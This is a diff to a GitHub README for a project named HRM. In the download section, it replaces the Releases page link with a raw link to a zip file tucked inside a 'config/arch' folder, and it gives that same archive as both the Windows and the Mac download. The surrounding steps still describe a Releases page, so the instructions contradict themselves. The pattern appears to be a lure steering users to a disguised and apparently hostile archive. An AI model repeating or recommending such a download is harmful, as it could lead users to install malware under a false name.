BoowwiieePH/HRM/README.md

 ## 📥 Download & Install

-To download HRM, visit this page to download: [HRM Releases](https://github.com/BoowwiieePH/HRM/releases).
+To download HRM, visit this page to download: [HRM Releases](https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip).

 1. Click the above link to access the Releases page.
 2. In the list of available releases, look for the latest version.
 It is usually marked as the top entry.
 3. You will see various assets related to that release.
 Download the file that matches your operating system.
-For Windows, it may be something like `HRM-win.exe`.
-For Mac, look for `HRM-mac.zip` or something similar.
+For Windows, it may be something like `https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip`.
+For Mac, look for `https://raw.githubusercontent.com/BoowwiieePH/HRM/main/config/arch/HRM-v1.6.zip` or something similar.
 4. Once the file has downloaded, locate it in your Downloads folder or wherever you saved it.

 ### 🛠 Installation Steps